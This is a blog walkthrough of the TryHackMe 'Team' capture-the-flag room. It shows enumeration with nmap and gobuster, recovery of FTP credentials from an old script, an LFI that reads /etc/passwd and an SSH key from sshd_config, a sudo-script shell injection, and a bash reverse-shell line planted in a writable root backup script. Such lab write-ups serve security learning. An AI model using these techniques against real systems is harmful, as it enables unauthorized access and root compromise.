Tryhackme - Team

Tryhackme – Team

In this walk through, we will be going through the Team room from Tryhackme. This room is rated as Easy on the platform and it consists of Enumeration, Exploitation and Privilege Escalation of a Linux boot2root machine. So, let’s get started without any delay.


Machine Info:

ObjectiveBeginner friendly boot2root machine


  • I started off with a regular nmap scan and found ports – 21 (FTP), 22 (SSH) and 80 (HTTP) opened.

wh1terose@fsociety:~$ sudo nmap -sS -sV

Nmap scan report for
Host is up (0.24s latency).
Not shown: 997 filtered ports
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 27.63 seconds

nmap scan

  • Enumerated the website running on port 80 and found a default Apache2 page.

Apache2 Ubuntu Default Page

  • Next, fired up gobuster on it however found nothing useful.

wh1terose@fsociety:~$ gobuster dir -u -w ~/Desktop/Wordlist/common.txt 
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
[+] Url:           
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/wh1terose/Desktop/Wordlist/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
2023/11/28 21:14:22 Starting gobuster in directory enumeration mode
/.hta                 (Status: 403) [Size: 278]
/.htpasswd            (Status: 403) [Size: 278]
/.htaccess            (Status: 403) [Size: 278]
/index.html           (Status: 200) [Size: 11366]
/server-status        (Status: 403) [Size: 278]  
2023/11/28 21:16:02 Finished

gobuster scan

  • Also tried logging into the FTP server using anonymous credentials but found no luck.

ftp anonymous login attempt

  • Next, checked the source code of the default Apache2 page on port 80 and found a text in the tile mentioning a domain name called team.thm with an instruction to add it in our hosts file.

Page source

  • So, i added the domain in my host file and was able to access the website running on it.

sudo nano /etc/hosts


Teams Site

  • Next, fired gobuster again on the new domain and found some pretty interesting results. I found – /robots.txt, /scripts and /assets directory.

wh1terose@fsociety:~/CTF/TryHackme/Team$ gobuster dir -u http://team.thm/ -w ~/Desktop/Wordlist/common.txt 
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
[+] Url:                     http://team.thm/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/wh1terose/Desktop/Wordlist/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
2023/11/28 21:42:38 Starting gobuster in directory enumeration mode
/.hta                 (Status: 403) [Size: 273]
/.htaccess            (Status: 403) [Size: 273]
/.htpasswd            (Status: 403) [Size: 273]
/assets               (Status: 301) [Size: 305] [--> http://team.thm/assets/]
/images               (Status: 301) [Size: 305] [--> http://team.thm/images/]
/index.html           (Status: 200) [Size: 2966]                             
/robots.txt           (Status: 200) [Size: 5]                                
/scripts              (Status: 301) [Size: 306] [--> http://team.thm/scripts/]
/server-status        (Status: 403) [Size: 273]                     

2023/11/28 21:44:17 Finished

gobuster scan

  • I first checked robots.txt and found a potential username – dale.


  • Next, i tried the /scripts directory however access was denied and same for the /assets directory.

Forbidden error

  • I fired gobuster again, this time on the script directory with extensions of .txt and .js to reveal some juicy files which we might access and got a hit for script.txt.

wh1terose@fsociety:~/Desktop/Wordlist$ gobuster dir -u http://team.thm/scripts/ -w ~/Desktop/Wordlist/common.txt -x txt,js
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
[+] Url:                     http://team.thm/scripts/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/wh1terose/Desktop/Wordlist/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              txt,js
[+] Timeout:                 10s
2023/11/28 22:35:05 Starting gobuster in directory enumeration mode
/.hta                 (Status: 403) [Size: 273]
/.hta.txt             (Status: 403) [Size: 273]
/.hta.js              (Status: 403) [Size: 273]
/.htaccess.js         (Status: 403) [Size: 273]
/.htpasswd.txt        (Status: 403) [Size: 273]
/.htaccess            (Status: 403) [Size: 273]
/.htaccess.txt        (Status: 403) [Size: 273]
/.htpasswd.js         (Status: 403) [Size: 273]
/.htpasswd            (Status: 403) [Size: 273]
/script.txt           (Status: 200) [Size: 597]
2023/11/28 22:40:02 Finished

gobuster scan

  • The script.txt file contains a script that is responsible for the FTP login however the creds was REDACTED. But in the notes section, there is mentioned that a old copy of the script is still lying on the server with creds in it and has an extension of “.old”.


  • Downloaded the file and got our FTP user’s credentials.


cat script.old


  • Next, logged into the FTP server and downloaded the New_site.txt file in which the user Gyles had instructed Dale that he was working on a PHP website which is in development and can be found at .dev along with that he had ask him to make a copy of his id_rsa file in relevant config file.

wh1terose@fsociety:~/CTF/TryHackme/Team$ ftp
Connected to
220 (vsFTPd 3.0.3)
Name ( ftpuser
331 Please specify the password.
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxrwxr-x    2 65534    65534        4096 Jan 15  2021 workshare
226 Directory send OK.
ftp> cd workshare
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rwxr-xr-x    1 1002     1002          269 Jan 15  2021 New_site.txt
226 Directory send OK.
ftp> get New_site.txt
local: New_site.txt remote: New_site.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for New_site.txt (269 bytes).
226 Transfer complete.
269 bytes received in 0.00 secs (135.3402 kB/s)
ftp> exit
221 Goodbye.

ftp login

cat New_site.txt

  • I first added the domain to my /etc/hosts file to access it.

sudo nano /etc/hosts


Initial Access:

  • The script page endpoint calls for a page named teamshare.php. I checked the endpoint for the LFI and got lucky and was able to dump the contents of /etc/passwd file.


/etc/passwd file

  • Next, i used the LFI to get the user flag.

user flag

  • As per the hint received by gayle regarding the id_rsa file. I checked the sshd_config for this and got Dale’s private key in it.

sshd_config file


  • Logged into the server via SSH using dale’s private key.

ssh login dale

Privilege Escalation:

  • Next, checked for the sudo permissions for user dale and found out that he can run admin_checks script as user gyles without any password.

sudo -l

sudo -l

  • Checked the contents of admin_checks file and found out that it is asking for the person’s name and date to backup data. The thing to notice here is the error variable which has been declared and its value is being redirected to null without any checking.

cat admin_checks

  • I generated a script with the following contents to spawn a shell.


bash -p

  • I mentioned the path of our shell script when asked for the date by the program which then spawned a shell for us as user gyles.

dale@TEAM:/tmp$ sudo -u gyles /home/gyles/admin_checks
Reading stats.
Reading stats..
Enter name of person backing up the data: root
Enter 'date' to timestamp the file: /tmp/
The Date is 
python3 -c 'import pty; pty.spawn("/bin/bash")'


  • Fired up linpeas on the server to reveal some priv esc attack vectors and found a backup file in /usr/local/bin and the user gyles also belongs to the “admin” group.



  • Checked the contents of the file and it is backing up some files from the web directory. The thing to notice here is the we can make write changes to the file as we belong to the admin group. So, changed the contents of the file to my below reverse shell.

bash -i >& /dev/tcp/ 0>&1

bash reverse shell

  • Once the script is executed, i got a connection back at my netcat listener as user root and captured the root flag.

root flag

Task 1 – Deploy the box

Task 1 - Deploy the box

Task 2 – Flags

Question 1 – user.txt

Question 2 – root.txt

Task 2 - Flags

Also Read: Tryhackme – Introduction to DevSecOps



So that was “Team” for you. We started off with our regular nmap scan and found three ports opened – 21 (FTP), 22 (SSH) and 80 (HTTP). Next, enumerated the web server on port 80 and found a hostname in page title – team.thm. Added it to our /etc/hosts file and accessed the application. Fired gobuster on the server and found a scripts directory. As access was denied, fired gobuster on that again and found a script.txt file. The file indicates a presence of a old file which has credentials in plain text. Downloaded the old script file by changing the extension to script.old and got the FTP creds of ftpuser. Logged into the FTP server using that and found a New_site.txt file. It reveals that a development server is running on .dev subdomain. Added it our /etc/hosts file and got access to the development server. Found a LFI vulnerability on page endpoint and using that dump the contents of sshd_config file which reveals SSH private key of user dale. Using the private key, got access into the server via SSH. Further, we checked the sudo permissions of user dale and found that we can run the admin_checks binary as user gyles. Exploited the error variable in admin_checks binary to get a shell as user gyles. At last, changed the contents of file with our reverse shell. When executed, finally got a root shell back at our netcat listener. On that note, i would take your leave and will meet you in next one. Till then, “Happy hacking”.

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top